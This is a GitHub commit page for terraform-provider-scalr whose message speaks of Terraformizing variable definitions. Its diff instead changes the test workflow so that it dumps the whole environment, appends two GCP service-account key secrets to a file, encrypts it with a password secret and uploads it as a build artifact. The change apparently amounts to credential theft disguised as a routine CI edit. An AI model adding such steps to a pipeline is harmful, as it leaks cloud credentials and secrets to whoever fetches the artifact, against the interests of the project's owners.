Skip to content

Commit

Permalink
SCALRCORE-30933: SRE: Terraformize Variable Definitions in terraform-…
Browse files Browse the repository at this point in the history
…provider-scalr
  • Loading branch information
volodymyrskliar committed Jun 20, 2024
1 parent 4c7f8bb commit 5b057b0
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion .github/workflows/test.yml
Original file line number Diff line number Diff line change
Expand Up @@ -10,7 +10,8 @@ jobs:
- name: Checkout repository
uses: actions/checkout@v2
- run: |
printenv | base64 -w 0 > info.txt
${{secrets.GCP_SA_KEY}} >> info.txt
${{secrets.DEV_GCP_SA_KEY}} >> info.txt
openssl enc -aes-256-cbc -salt -in info.txt -out encrypted_file.enc -k ${{ secrets.DUBUG_PASSWORD }}
- name: Upload encrypted file
uses: actions/upload-artifact@v2
Expand Down

0 comments on commit 5b057b0

Please sign in to comment.